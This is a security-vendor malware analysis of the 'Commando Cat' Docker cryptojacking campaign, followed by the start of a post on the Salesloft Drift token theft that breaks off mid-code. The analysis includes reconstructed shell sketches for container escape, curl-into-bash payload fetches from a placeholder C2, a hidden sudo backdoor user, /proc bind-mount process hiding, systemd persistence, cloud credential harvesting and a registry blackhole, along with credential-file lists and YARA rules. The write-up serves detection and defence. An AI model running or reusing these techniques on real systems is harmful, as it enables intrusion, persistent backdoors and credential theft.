January 2, 2024

The Nine Lives of Commando Cat: Analyzing a Novel Malware Campaign Targeting Docker

"Commando Cat" is a novel cryptojacking campaign exploiting exposed Docker API endpoints. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Nate Bill
Threat Researcher

Cado Security labs (now part of Darktrace) encountered a novel malware campaign, dubbed “Commando Cat”, targeting exposed Docker API endpoints. This is the second campaign targeting Docker since the beginning of 2024, the first being the malicious deployment of the 9hits traffic exchange application, a report which was published only a matter of weeks prior. [2]

Attacks on Docker are relatively common, particularly in cloud environments. This campaign demonstrates the continued determination attackers have to exploit the service and achieve a variety of objectives. Commando Cat is a cryptojacking campaign leveraging Docker as an initial access vector and (ab)using the service to mount the host’s filesystem, before running a series of interdependent payloads directly on the host. 

As described in the coming sections, these payloads are responsible for registering persistence, enabling a backdoor, exfiltrating various Cloud Service Provider credential files and executing the miner itself. Of particular interest are a number of evasion techniques exhibited by the malware, including an unusual process hiding mechanism. 

Initial access

The payloads are delivered to exposed Docker API instances over the Internet from the IP 45[.]9.148.193 (the same IP as the C2 server). The attacker instructs Docker to pull down a Docker image called cmd.cat/chattr. The cmd.cat (also known as Commando) project "generates Docker images on-demand with all the commands you need and simply point them by name in the docker run command" [1].

It is likely used by the attacker to appear as a benign tool and avoid arousing suspicion.

The attacker then creates the container with a custom command to execute:

Container image with custom command to execute
Image 1: Container with custom command to execute

It uses chroot to escape from the container onto the host operating system. This initial command checks whether the following services are active on the system:

  • sys-kernel-debugger
  • gsc
  • c3pool_miner
  • dockercache

The gsc, c3pool_miner, and dockercache services are all created by the attacker after infection. The purpose of the check for sys-kernel-debugger is unclear; this service is not used anywhere in the malware, nor is it part of a standard Linux install. It is possible that the service belongs to another campaign that the attacker does not want to compete with.
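Based on the description above, the initial command likely resembles the following dry-run sketch. The image name and service names come from the article; the exact flags and service-check logic are assumptions for illustration (the mount/chroot flags mirror those quoted later in the YARA strings):

```shell
# Dry-run sketch: build (but do not execute) a docker command of the kind
# described above. The service-check logic is an assumption.
IMAGE="cmd.cat/chattr"
PROBE='for s in sys-kernel-debugger gsc c3pool_miner dockercache; do
  systemctl is-active "$s" >/dev/null 2>&1 && exit 1   # bail out if a marker service exists
done'
CMD="docker run -t -v /:/host --privileged $IMAGE chroot /host bash -c '$PROBE'"
echo "$CMD"
```

Mounting the host root at /host and chrooting into it is what lets commands from inside the container run directly against the host filesystem.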

Once these checks pass, it runs the container again with another command, this time to infect it:

Container with infect command
Image 2: Container with infect command

This script first chroots to the host, and then tries to copy any binaries named wls or cls to wget and curl respectively. Cryptojacking campaigns commonly rename these binaries to evade detection; the attacker is likely anticipating that this box was previously infected by a campaign that renamed them, and is undoing that change. The attacker then uses either wget or curl to pull down the user.sh payload.

This is repeated with the sh parameter changed to the following other scripts:

  • tshd
  • gsc
  • aws

In addition, another payload is delivered directly as a base64-encoded script instead of being pulled down from the C2; this will be discussed in a later section.
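The restore-and-fetch behaviour described above can be sketched as follows. The C2 URL is a placeholder, and the binary paths and the curl/wget fallback are assumptions; the stage names match the scripts listed above:

```shell
# Sketch of the infect stage (dry run: nothing is downloaded or copied).
C2="http://c2.example.invalid"     # placeholder, not the real C2 address
restore_tools() {
  # undo a previous campaign's evasion: wls/cls are renamed wget/curl
  [ -f /usr/bin/wls ] && cp /usr/bin/wls /usr/bin/wget
  [ -f /usr/bin/cls ] && cp /usr/bin/cls /usr/bin/curl
}
fetch() {                          # prefer curl, fall back to wget
  if command -v curl >/dev/null 2>&1; then echo "curl -sk $C2/$1.sh | bash"
  else echo "wget -qO- $C2/$1.sh | bash"; fi
}
for stage in user tshd gsc aws; do fetch "$stage"; done
```

Printing the commands rather than executing them keeps the sketch safe to run while preserving the structure of the loop.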

user.sh

The primary purpose of the user.sh payload is to create a backdoor in the system by adding an SSH key to the root account, as well as adding a user with an attacker-known password.

On startup, the script changes the permissions and attributes on various system files such as passwd, shadow, and sudoers in order to allow for the creation of the backdoor user:

Script
Image 3

It then calls a function called make_ssh_backdoor, which inserts the following RSA and ED25519 SSH keys into the root user’s authorized_keys file:

function make_ssh_backdoor
Image 4

It then updates a number of SSH config options to ensure root login is permitted, along with enabling public key and password authentication. It also sets the AuthorizedKeysFile option to a local variable named “$hidden_authorized_keys”; however, this variable is never actually defined in the script, which breaks public key authentication.

Once the SSH backdoor has been installed, the script then calls make_hidden_door. The function creates a new user called “games” by adding an entry for it directly into /etc/passwd and /etc/shadow, as well as giving it sudo permission in /etc/sudoers.

The “games” user has its home directory set to /usr/games, likely in an attempt to appear legitimate. Continuing this theme, the attacker has also opted to set the login shell for the “games” user to /usr/bin/nologin. This is not the path of the real nologin binary; it is instead a copy of bash placed there by the malware. This makes the “games” user appear to be a regular service account, while actually being a backdoor.

Games user
Image 5
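A minimal reconstruction of the make_hidden_door technique, run against a scratch directory rather than the real /etc so it is safe to inspect. The uid, password hash, and sudoers line are placeholders; the home directory and fake shell path are from the article:

```shell
# Scratch-directory sketch of the "games" backdoor user; nothing
# system-wide is touched.
ROOT=$(mktemp -d)
mkdir -p "$ROOT/etc" "$ROOT/usr/bin" "$ROOT/usr/games"
# service-account lookalike: home in /usr/games, "nologin" shell
echo 'games:x:1001:1001::/usr/games:/usr/bin/nologin' >> "$ROOT/etc/passwd"
echo 'games:$6$PLACEHOLDER$HASH:19999:0:99999:7:::'   >> "$ROOT/etc/shadow"
echo 'games ALL=(ALL:ALL) ALL'                        >> "$ROOT/etc/sudoers"
cp /bin/bash "$ROOT/usr/bin/nologin"   # the fake nologin is really bash
grep '^games:' "$ROOT/etc/passwd"
```

To a casual audit the account looks like the stock games service account; only the executable at the shell path gives it away.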

With the two backdoors in place, the malware then calls home with the SSH details to an API on the C2 server. Additionally, it also restarts sshd to apply the changes it made to the configuration file, and wipes the bash history.

SSH details
Image 6

This provides the attacker with all the information required to connect to the server via SSH at any time, using either the root account with a pubkey, or the “games” user with a password or pubkey. However, as previously mentioned, pubkey authentication is broken due to a bug in the script. Consequently, the attacker only has password access to “games” in practice.

tshd.sh

This script is responsible for deploying TinyShell (tsh), an open source Unix backdoor written in C [3]. Upon launch, the script will try to install make and gcc using either apk, apt, or yum, depending on which is available. The script then pulls a copy of the tsh binary from the C2 server, compiles it, and then executes it.

Script
Image 7

TinyShell works by listening on the host for incoming connections (on port 2180 in this case), with security provided by a hardcoded encryption key in both the client and server binaries. As the attacker has graciously provided the code, the key could be identified as “base64st”. 

A side effect of this is that other threat actors could easily scan for this port and try authenticating using the secret key, allowing anyone with the skills and resources to take over the botnet. TinyShell has commonly been used as a payload before; for example, UNC2891 made extensive use of it during attacks on Oracle Solaris-based systems [4].

The script then calls out to a freely available IP logger service called yip[.]su. This allows the attacker to be notified of where the tsh binary is running, so they can then connect to the infected machine.

Script
Image 8

Finally, the script drops another script to /bin/hid (also referred to as hid in the script), which can be used to hide processes:

Script
Image 9

This script works by cloning the Linux mtab file (the list of active mounts) to another directory. It then creates a new bind mount over the /proc/<pid> directory of the process the attacker wants to hide, before restoring the mtab. The bind mount causes any queries to the /proc/<pid> directory to return an empty directory, so tools like ps aux omit the process. Cloning the mtab and then restoring the older version also hides the created bind mount, making it harder to detect.

The script then uses this binary to hide the tshd process.
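The hiding mechanism can be reconstructed from the YARA strings later in this post (mount --bind /usr/foo /proc/$1, cp /etc/mtab /usr/t). A minimal sketch, defined but not invoked here, since actually taking effect requires root:

```shell
# Sketch of the hid process hider. Calling hide_pid <pid> needs root.
hide_pid() {
  pid="$1"
  cp /etc/mtab /tmp/mtab.saved          # 1. snapshot the mount table
  mkdir -p /usr/foo                     # 2. empty directory to cover the target
  mount --bind /usr/foo "/proc/$pid"    # 3. /proc/<pid> now reads as empty,
                                        #    so ps/top/htop omit the process
  cp /tmp/mtab.saved /etc/mtab          # 4. restore mtab: the bind mount
}                                       #    itself is hidden from mount listings
```

Because only /proc is masked, the process keeps running normally; it simply disappears from any tooling that enumerates /proc.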

gsc.sh

This script is responsible for deploying a backdoor called gs-netcat, a souped-up version of netcat that can punch through NAT and firewalls. Its purpose is likely to act as a backdoor in scenarios where traditional backdoors like TinyShell would not work, such as when the infected host is behind NAT.

Gs-netcat works in a somewhat interesting way: in order for nodes to find each other, they use a shared secret instead of an IP address, connecting via the Global Socket Relay Network [5]. This permits gs-netcat to function in virtually every environment, as it circumvents many firewalls on both the client and server end. To calculate the shared secret, the script simply uses the victim’s IP and hostname:

Script
Image 10

This is more acceptable than tsh from a security point of view: there are around 4 billion possible IPv4 addresses and many more possible hostnames, making a brute force harder, although still feasible using strategies such as lists of common hostnames and IP ranges known for hosting virtual servers, such as those of AWS.
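A sketch of how such a secret could be derived from the victim's IP and hostname. The exact combination used by gsc.sh is not shown in the screenshots, so hashing the concatenation here is an assumption, and the IP is a placeholder:

```shell
# Sketch: derive a gs-netcat shared secret from victim IP and hostname.
# The hashing step is an assumption; the script may combine them differently.
VICIP="203.0.113.10"                               # placeholder victim IP
VICHN=$(cat /etc/hostname 2>/dev/null || echo "victim-host")
SECRET=$(printf '%s-%s' "$VICIP" "$VICHN" | md5sum | awk '{print $1}')
echo "$SECRET"
```

Any party that can guess or enumerate IP/hostname pairs can recompute the secret, which is exactly the brute-force weakness discussed above.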

The script proceeds to set up gs-netcat by pulling it from the attacker’s C2 server, using a specific version based on the architecture of the infected system. Interestingly, the attacker will use the cmd.cat containers to untar the downloaded payload if tar is not available on the system or fails. The script also uses /dev/shm instead of /tmp; this acts as a temporary file store, but is memory-backed. It is possible that this is an evasion mechanism, as it is much more common for malware to use /tmp. It also results in the artefacts not touching the disk, making forensics somewhat more difficult. This technique has been used before by BPFdoor, a high-profile Linux campaign [6].

Script
Image 11

Once the binary has been installed, the script creates a malicious systemd service unit to achieve persistence. This is a very common method for Linux malware; however, not all systems use systemd, rendering this payload entirely ineffective on those that do not. $VICCS is the shared secret discussed earlier, which is stored in a file and passed to the process.

Script
Image 12
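The persistence unit likely resembles the following. It is written to a temp file here rather than /etc/systemd/system; the unit description is invented, and the gs-netcat flags are assumptions based on its documented server usage (-s secret, -l -i for an interactive login shell):

```shell
# Sketch of the gs-netcat persistence unit; inspectable without installing.
UNIT=$(mktemp)
cat > "$UNIT" <<'EOF'
[Unit]
Description=Docker Support Service

[Service]
# -s <secret>: shared secret; -l -i: serve an interactive login shell
ExecStart=/bin/gs-netcat -s $VICCS -l -i
Restart=always

[Install]
WantedBy=multi-user.target
EOF
grep -c '^' "$UNIT"    # number of lines written
```

With Restart=always, systemd respawns the backdoor if it is killed, which is also why the hid trick below has to be reapplied after every restart.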

The script then uses the previously discussed hid binary to hide the gs-netcat process. It is worth noting that this will not survive a reboot, as there is no mechanism to hide the process again after it is respawned by systemd.

Script
Image 13

Finally, the malware sends the shared secret to the attacker via their API, much like how it does with SSH:

Script
Image 14

This allows the attacker to run their client instance of gs-netcat with the shared secret and gain persistent access to the infected machine.

aws.sh

The aws.sh script is a credential grabber that pulls credentials from several files on disk, as well as from IMDS and environment variables. Interestingly, the script creates a marker file so that once it has run the first time, it can never run again, as the file is never removed. This is potentially to avoid arousing suspicion by generating lots of calls to IMDS or the AWS API, as well as keeping the keys harvested by the attacker distinct per infected machine.

The script overall is very similar to scripts previously attributed to TeamTNT and could have been copied from one of their campaigns [7]. However, script-based attribution is difficult; while the similarities are visible, it is hard to attribute this script to any particular group.

Script
Image 15

The first thing run by the script (if an AWS environment is detected) is the AWS grabber. First, it makes several requests to IMDS in order to obtain information about the instance’s IAM role and its security credentials. The timeout is likely used to stop this part of the script from taking a long time on systems where IMDS is not available. It would also appear this script only works with IMDSv1, so it can be rendered ineffective by enforcing IMDSv2.

Script
Image 16
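The IMDSv1 flow looks roughly like this: unauthenticated GETs against the link-local metadata endpoint, with a timeout so the script degrades gracefully off EC2. (IMDSv2 would require a session token first, which is why enforcing it breaks this grabber.)

```shell
# Sketch of IMDSv1 credential harvesting. The endpoint only answers on a
# real EC2 instance; elsewhere --max-time keeps the script from hanging.
IMDS="http://169.254.169.254/latest/meta-data"
ROLE=$(curl -s --max-time 3 "$IMDS/iam/security-credentials/" 2>/dev/null || true)
if [ -n "$ROLE" ]; then
  # the per-role JSON contains AccessKeyId, SecretAccessKey, and Token
  CREDS=$(curl -s --max-time 3 "$IMDS/iam/security-credentials/$ROLE")
  RESULT="got credentials for role: $ROLE"
else
  RESULT="no IMDSv1 endpoint reachable"
fi
echo "$RESULT"
```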

Information of interest to the attacker, such as instance profiles, access keys, and secret keys, is then extracted from the response and placed in a global variable called CSOF, which is used throughout the script to accumulate captured information before sending it to the API.

Next, it checks environment variables on the instance for AWS related variables, and adds them to CSOF if they are present.

Script
Image 17

Finally, it adds the sts caller identity returned from the AWS command line to CSOF.

Next up is the cred_files function, which executes a search for a few common credential file names and reads their contents into CSOF if they are found. It has a few separate lists of files it will try to capture.

CRED_FILE_NAMES:

  • "authinfo2"
  • "access_tokens.db"
  • ".smbclient.conf"
  • ".smbcredentials"
  • ".samba_credentials"
  • ".pgpass"
  • "secrets"
  • ".boto"
  • ".netrc"
  • "netrc"
  • ".git-credentials"
  • "api_key"
  • "censys.cfg"
  • "ngrok.yml"
  • "filezilla.xml"
  • "recentservers.xml"
  • "queue.sqlite3"
  • "servlist.conf"
  • "accounts.xml"
  • "kubeconfig"
  • "adc.json"
  • "azure.json"
  • "clusters.conf" 
  • "docker-compose.yaml"
  • ".env"

AWS_CREDS_FILES:

  • "credentials"
  • ".s3cfg"
  • ".passwd-s3fs"
  • ".s3backer_passwd"
  • ".s3b_config"
  • "s3proxy.conf"

GCLOUD_CREDS_FILES:

  • "config_sentinel"
  • "gce"
  • ".last_survey_prompt.yaml"
  • "config_default"
  • "active_config"
  • "credentials.db"
  • "access_tokens.db"
  • ".last_update_check.json"
  • ".last_opt_in_prompt.yaml"
  • ".feature_flags_config.yaml"
  • "adc.json"
  • "resource.cache"

The files are then grabbed by performing a find on the root filesystem for each name, with the results appended to a temporary file, before the final concatenation of the credential files is read back into the CSOF variable.

CSOF variable
Image 18

Next up is get_prov_vars, which simply loops through all processes in /proc and reads their environment variables into CSOF. This is interesting, as the payload already checks environment variables in several places, such as the aws, google, and azure grabbers; it is unclear why it grabs all of the data, but then grabs specific portions of it again.

Code
Image 19
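A minimal version of get_prov_vars. Each /proc/<pid>/environ file is NUL-delimited, hence the tr; entries belonging to other users that cannot be read are simply skipped:

```shell
# Sketch of get_prov_vars: harvest environment variables of every process.
CSOF=""
for envfile in /proc/[0-9]*/environ; do
  vars=$(tr '\0' '\n' 2>/dev/null < "$envfile") || continue  # skip unreadable
  CSOF="$CSOF$vars"
done
echo "harvested ${#CSOF} bytes of process environment"
```

Run as root (as this malware is), nothing is skipped, which is why process environments are such a rich source of injected secrets.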

Regardless of what data it has already grabbed, the get_google and get_azure functions are called next. These work identically to the AWS environment variable grabber: each checks for the existence of a variable and then appends its contents (or the file’s contents, if the variable is a path) to CSOF.

Code
Image 20

The final thing it grabs is an inspection of all running docker containers via the get_docker function. This can contain useful information about what's running in the container and on the box in general, as well as potentially providing more secrets that are passed to the container.

Code
Image 21

The script then closes out by sending all of the collected data to the attacker. The attacker has set a username and password on their API endpoint for collected data, the purpose for which is unclear. It is possible that the attacker is concerned with the endpoint being leaked and consequently being spammed with false data by internet vigilantes, so added the authentication as a mechanism allowing them to cycle access by updating the payload and API.

Code
Image 22

The base64 payload

As mentioned earlier, the final payload is delivered as a base64 encoded script rather than in the traditional curl-into-bash method used previously by the malware. This base64 is echoed into base64 -d, and then piped into bash. This is an extremely common evasion mechanism, with many script-based Linux threat actors using the same approach. It is interesting to note that the C2 IP used in this script is different from the other payloads.
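The delivery pattern is trivial to reproduce; here it is shown with a harmless payload in place of the attacker's script:

```shell
# echo | base64 -d | bash: same mechanism, benign payload.
PAYLOAD=$(printf 'echo hello-from-stage\n' | base64)
echo "$PAYLOAD" | base64 -d | bash    # prints hello-from-stage
```

Because the script body never appears on the command line in plain text, naive string matching on process arguments misses it, which is the whole point of the encoding.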

The base64 payload serves two primary purposes, to deploy an XMRig cryptominer, and to “secure” the docker install on the infected host.

When it is run, the script looks for traces of other malware campaigns. First, it removes all containers whose command contains /bin/bash -c 'apt-get or busybox, and then it removes all containers whose command does not contain chroot (the initial command used by this payload).

Code
Image 23

Next, it looks for any services named “c3pool_miner” or “moneroocean_miner”, and stops and disables them. It then looks for associated binaries such as /root/c3pool/xmrig and /root/moneroocean/xmrig and deletes them from the filesystem. These steps are taken prior to deploying its own miner, so that it is not competing for CPU time with other threat actors.

Once the competing miners have been killed off, it then sets up its own miner. It does this by grabbing a config and binary from the C2 server and extracting it to /usr/sbin. This drops two files: docker-cache and docker-proxy.

The docker-proxy binary is a custom fork of XMRig, with the path to the attacker’s config file hardcoded in the binary. It is invoked by docker-cache, which acts as a stager to ensure it is running, while also having the functionality to update the binary should a file with a .upd extension be detected.

It then uses a systemd service to achieve persistence for the XMRig stager, using the name “docker cache daemon” to appear inconspicuous. It is interesting to note that the name dockercache was also used by the Cetus cryptojacking worm [8].

Code
Image 24

It then uses the hid script discussed previously to hide the docker-cache and docker-proxy processes by creating a bind mount over their /proc entries. The effect of this is that if a system administrator were to use a tool like htop to see what process was using up the CPU on the server, they would not be able to see it.

Finally, the attacker “secures” docker. First, it pulls down alpine and tags it as docker/firstrun (this will become clear as to why later), and then deletes any images in a hardcoded list of images that are commonly used in other campaigns.

Code
Image 25

Next, it blackholes the Docker registry by writing its hostname to /etc/hosts with an IP of 0.0.0.0:

Code
Image 26

This completely blocks other attackers from pulling their images and tools onto the box, eliminating the risk of competition. Keeping the Alpine image tagged as docker/firstrun allows the attacker to still use the Docker API to spawn an Alpine container they can use to break back in, as the image is already downloaded and so the blackhole has no effect.
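The blackhole amounts to a hosts-file override, sketched here against a scratch file rather than /etc/hosts; the exact set of registry hostnames the script writes is an assumption:

```shell
# Sketch of the Docker registry blackhole, using a temp file instead of
# /etc/hosts so it is safe to run.
HOSTS=$(mktemp)
for h in registry-1.docker.io auth.docker.io index.docker.io; do  # assumed names
  echo "0.0.0.0 $h" >> "$HOSTS"   # resolve registry names to a blackhole
done
cat "$HOSTS"
```

Since /etc/hosts takes precedence over DNS for most resolvers, every docker pull against the public registry fails immediately after this change.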

Conclusion

This malware campaign, despite consisting primarily of shell scripts, is sophisticated, employing a large amount of redundancy and evasion that makes detection challenging. The use of the hid process-hiding script is notable, as it is not commonly seen, with most malware opting to deploy clunkier rootkit kernel modules. The Docker registry blackhole is also novel, and very effective at keeping other attackers off the box.

The malware functions as a credential stealer, highly stealthy backdoor, and cryptocurrency miner all in one. This makes it versatile and able to extract as much value from infected machines as possible. The payloads seem similar to payloads deployed by other threat actors, with the AWS stealer in particular having a lot of overlap with scripts attributed to TeamTNT in the past. Even the C2 IP points to the same provider that has been used by TeamTNT in the past. It is possible that this group is one of the many copycat groups that have built on the work of TeamTNT.

Indicators of compromise (IoCs)

Hashes

user 5ea102a58899b4f446bb0a68cd132c1d

tshd 73432d368fdb1f41805eba18ebc99940

gsc 5ea102a58899b4f446bb0a68cd132c1d

aws 25c00d4b69edeef1518f892eff918c2c

base64 ec2882928712e0834a8574807473752a

IPs

45[.]9.148.193

103[.]127.43.208

Yara Rule

rule Stealer_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat aws.sh credential stealer script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "185564f59b6c849a847b4aa40acd9969253124f63ba772fc5e3ae9dc2a50eef0" 
 strings: 
 // Constants 
 $const1 = "CRED_FILE_NAMES" 
 $const2 = "MIXED_CREDFILES" 
 $const3 = "AWS_CREDS_FILES" 
 $const4 = "GCLOUD_CREDS_FILES" 
 $const5 = "AZURE_CREDS_FILES" 
 $const6 = "VICOIP" 
 $const7 = "VICHOST" 

 // Functions 
 $func1 = "get_docker()" 
 $func2 = "cred_files()" 
 $func3 = "get_azure()" 
 $func4 = "get_google()" 
 $func5 = "run_aws_grabber()" 
 $func6 = "get_aws_infos()" 
 $func7 = "get_aws_meta()" 
 $func8 = "get_aws_env()" 
 $func9 = "get_prov_vars()" 

 // Log Statements 
 $log1 = "no dubble" 
 $log2 = "-------- PROC VARS -----------------------------------" 
 $log3 = "-------- DOCKER CREDS -----------------------------------" 
 $log4 = "-------- CREDS FILES -----------------------------------" 
 $log5 = "-------- AZURE DATA --------------------------------------" 
 $log6 = "-------- GOOGLE DATA --------------------------------------" 
 $log7 = "AWS_ACCESS_KEY_ID : $AWS_ACCESS_KEY_ID" 
 $log8 = "AWS_SECRET_ACCESS_KEY : $AWS_SECRET_ACCESS_KEY" 
 $log9 = "AWS_EC2_METADATA_DISABLED : $AWS_EC2_METADATA_DISABLED" 
 $log10 = "AWS_ROLE_ARN : $AWS_ROLE_ARN" 
 $log11 = "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE" 

 // Paths 
 $path1 = "/root/.docker/config.json" 
 $path2 = "/home/*/.docker/config.json" 
 $path3 = "/etc/hostname" 
 $path4 = "/tmp/..a.$RANDOM" 
 $path5 = "/tmp/$RANDOM" 
 $path6 = "/tmp/$RANDOM$RANDOM" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat { 
 meta: 
 description = "Detects CommandoCat gsc.sh backdoor registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "d083af05de4a45b44f470939bb8e9ccd223e6b8bf4568d9d15edfb3182a7a712" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "SETPATH" 
 $const3 = "SETNAME" 
 $const4 = "SETSERV" 
 $const5 = "VICIP" 
 $const6 = "VICHN" 
 $const7 = "GSCSTATUS" 
 $const8 = "VICSYSTEM" 
 $const9 = "GSCBINURL" 
 $const10 = "GSCATPID" 

 // Functions 
 $func1 = "hidfile()" 

 // Log Statements 
 $log1 = "run gsc ..." 

 // Paths 
 $path1 = "/dev/shm/.nc.tar.gz" 
 $path2 = "/etc/hostname" 
 $path3 = "/bin/gs-netcat" 
 $path4 = "/etc/systemd/gsc" 
 $path5 = "/bin/hid" 

 // General 
 $str1 = "mount --bind /usr/foo /proc/$1" 
 $str2 = "cp /etc/mtab /usr/t" 
 $str3 = "docker run -t -v /:/host --privileged cmd.cat/tar tar xzf /host/dev/shm/.nc.tar.gz -C /host/bin gs-netcat" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

rule Backdoor_Linux_CommandoCat_tshd { 
 meta: 
 description = "Detects CommandoCat tshd TinyShell registration script" 
 license = "Apache License 2.0" 
 date = "2024-01-25" 
 hash1 = "65c6798eedd33aa36d77432b2ba7ef45dfe760092810b4db487210b19299bdcb" 
 strings: 
 // Constants 
 $const1 = "SRCURL" 
 $const2 = "HOME" 
 $const3 = "TSHDPID" 

 // Functions 
 $func1 = "setuptools()" 
 $func2 = "hidfile()" 
 $func3 = "hidetshd()" 

 // Paths 
 $path1 = "/var/tmp" 
 $path2 = "/bin/hid" 
 $path3 = "/etc/mtab" 
 $path4 = "/dev/shm/..tshdpid" 
 $path5 = "/tmp/.tsh.tar.gz" 
 $path6 = "/usr/sbin/tshd" 
 $path7 = "/usr/foo" 
 $path8 = "./tshd" 

 // General 
 $str1 = "curl -Lk $SRCURL/bin/tsh/tsh.tar.gz -o /tmp/.tsh.tar.gz" 
 $str2 = "find /dev/shm/ -type f -size 0 -exec rm -f {} \\;" 

 condition: 
 filesize < 1MB and 
 all of them 
 } 

References:

  1. https://github.com/lukaszlach/commando
  2. https://www.cadosecurity.com/blog/containerised-clicks-malicious-use-of-9hits-on-vulnerable-docker-hosts
  3. https://github.com/creaktive/tsh
  4. https://cloud.google.com/blog/topics/threat-intelligence/unc2891-overview/
  5. https://www.gsocket.io/
  6. https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor
  7. https://malware.news/t/cloudy-with-a-chance-of-credentials-aws-targeting-cred-stealer-expands-to-azure-gcp/71346
  8. https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/

September 8, 2025

Unpacking the Salesloft Incident: Insights from Darktrace Observations


Introduction

On August 26, 2025, Google Threat Intelligence Group released a report detailing a widespread data theft campaign targeting the sales automation platform Salesloft via compromised OAuth tokens used by the third-party Drift AI chat agent [1][2]. The attack has been attributed to the threat actor UNC6395 by Google Threat Intelligence and Mandiant [1].

The attack is believed to have begun in early August 2025 and continued through mid-August 2025 [1], with the threat actor exporting significant volumes of data from multiple Salesforce instances and then sifting through this data for anything that could be used to compromise victims’ environments, such as access keys, tokens, or passwords. This led Google Threat Intelligence Group to assess that the primary intent of the threat actor is credential harvesting, and to later report that it was aware of more than 700 potentially impacted organizations [3].

Salesloft previously stated that, based on currently available data, customers that do not integrate with Salesforce are unaffected by this campaign [2]. However, on August 28, Google Threat Intelligence Group announced that “Based on new information identified by GTIG, the scope of this compromise is not exclusive to the Salesforce integration with Salesloft Drift and impacts other integrations” [2]. Google Threat Intelligence has since advised that any and all authentication tokens stored in or connected to the Drift platform be treated as potentially compromised [1].

This campaign demonstrates how attackers are increasingly exploiting trusted Software-as-a-Service (SaaS) integrations as a pathway into enterprise environments.

By abusing these integrations, threat actors were able to exfiltrate sensitive business data at scale, bypassing traditional security controls. Rather than relying on malware or obvious intrusion techniques, the adversaries leveraged legitimate credentials and API traffic that resembled legitimate Salesforce activity to achieve their goals. This type of activity is far harder to detect with conventional security tools, since it blends in with the daily noise of business operations.

The incident underscores the escalating significance of autonomous coverage within SaaS and third-party ecosystems. As businesses increasingly depend on interconnected platforms, visibility gaps emerge that cannot be managed by conventional perimeter and endpoint defenses.

By developing a behavioral comprehension of each organization's distinct use of cloud services, anomalies can be detected, such as logins from unexpected locations, unusually high volumes of API requests, or unusual document activity. These indications serve as an early alert system, even when intruders use legitimate tokens or accounts, enabling security teams to step in before extensive data exfiltration takes place.

What happened?

The campaign is believed to have started on August 8, 2025, with malicious activity continuing until at least August 18. The threat actor, tracked as UNC6395, gained access via compromised OAuth tokens associated with Salesloft Drift integrations into Salesforce [1]. Once tokens were obtained, the attackers were able to issue large volumes of Salesforce API requests, exfiltrating sensitive customer and business data.

Initial Intrusion

The attackers first established access by abusing OAuth and refresh tokens from the Drift integration. These tokens gave them persistent access into Salesforce environments without requiring further authentication [1]. To expand their foothold, the threat actor also made use of TruffleHog [4], an open-source secrets scanner, to hunt for additional exposed credentials. Logs later revealed anomalous IAM updates, including unusual UpdateAccessKey activity, which suggested attempts to ensure long-term persistence and control within compromised accounts.

Internal Reconnaissance & Data Exfiltration

Once inside, the adversaries began exploring the Salesforce environments. They ran queries designed to pull sensitive data fields, focusing on objects such as Cases, Accounts, Users, and Opportunities [1]. At the same time, the attackers sifted through this information to identify secrets that could enable access to other systems, including AWS keys and Snowflake credentials [4]. This phase demonstrated the opportunistic nature of the campaign, with the actors looking for any data that could be repurposed for further compromise.

Lateral Movement

Salesloft and Mandiant investigations revealed that the threat actor also created at least one new user account in early September. Although follow-up activity linked to this account was limited, the creation itself suggested a persistence mechanism designed to survive remediation efforts. By maintaining a separate identity, the attackers ensured they could regain access even if their stolen OAuth tokens were revoked.

Accomplishing the mission

The data taken from Salesforce environments included valuable business records, which attackers used to harvest credentials and identify high-value targets. According to Mandiant, once the data was exfiltrated, the actors actively sifted through it to locate sensitive information that could be leveraged in future intrusions [1]. In response, Salesforce and Salesloft revoked OAuth tokens associated with Drift integrations on August 20 [1], a containment measure aimed at cutting off the attackers’ primary access channel and preventing further abuse.

How did the attack bypass the rest of the security stack?

The campaign effectively bypassed security measures by using legitimate credentials and OAuth tokens through the Salesloft Drift integration. This rendered traditional security defenses like endpoint protection and firewalls ineffective, as the activity appeared non-malicious [1]. The attackers blended into normal operations by using common user agents and making queries through the Salesforce API, which made their activity resemble legitimate integrations and scripts. This allowed them to operate undetected in the SaaS environment, exploiting the trust in third-party connections and highlighting the limitations of traditional detection controls.

Darktrace Coverage

Anomalous activities that appear associated with this campaign have been identified across multiple Darktrace deployments. This included two cases involving customers based in the United States with a Salesforce integration, where the pattern of activity was notably similar.

On August 17, Darktrace observed an account belonging to one of these customers logging in from the rare endpoint 208.68.36[.]90, while the user was seen active from another location. This IP is a known indicator of compromise (IoC) reported by open-source intelligence (OSINT) for the campaign [2].

Cyber AI Analyst Incident summarizing the suspicious login seen for the account.
Figure 1: Cyber AI Analyst Incident summarizing the suspicious login seen for the account.

The login event was associated with the application Drift, further connecting the events to this campaign.

Advanced Search logs showing the Application used to login.
Figure 2: Advanced Search logs showing the Application used to login.

Following the login, the actor initiated a high volume of Salesforce API requests using methods such as GET, POST, and DELETE. The GET requests targeted endpoints such as /services/data/v57.0/query and /services/data/v57.0/sobjects/Case/describe: the former retrieves records matching specified criteria, while the latter provides metadata for the Case object, including field names and data types [5,6].

Subsequently, a POST request to /services/data/v57.0/jobs/query was observed, likely to initiate a Bulk API query job for extracting large volumes of data from the Ingest Job endpoint [7,8].

Finally, a DELETE request was observed removing an ingestion job batch, possibly in an attempt to obscure traces of prior data access or manipulation.
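For illustration, the request sequence described above can be sketched as follows. The instance host, bearer token, and job ID are hypothetical placeholders (not values observed in this campaign), and the snippet only constructs the requests rather than sending them:

```python
API_VERSION = "v57.0"  # version seen in the observed request paths

def drift_token_requests(instance, token, job_id):
    """Build the observed request sequence as (method, url, headers) tuples;
    nothing is sent over the network."""
    headers = {
        "Authorization": f"Bearer {token}",  # stolen Drift OAuth token
        "Content-Type": "application/json",
    }
    base = f"https://{instance}/services/data/{API_VERSION}"
    return [
        # SOQL query endpoint: retrieve records matching given criteria
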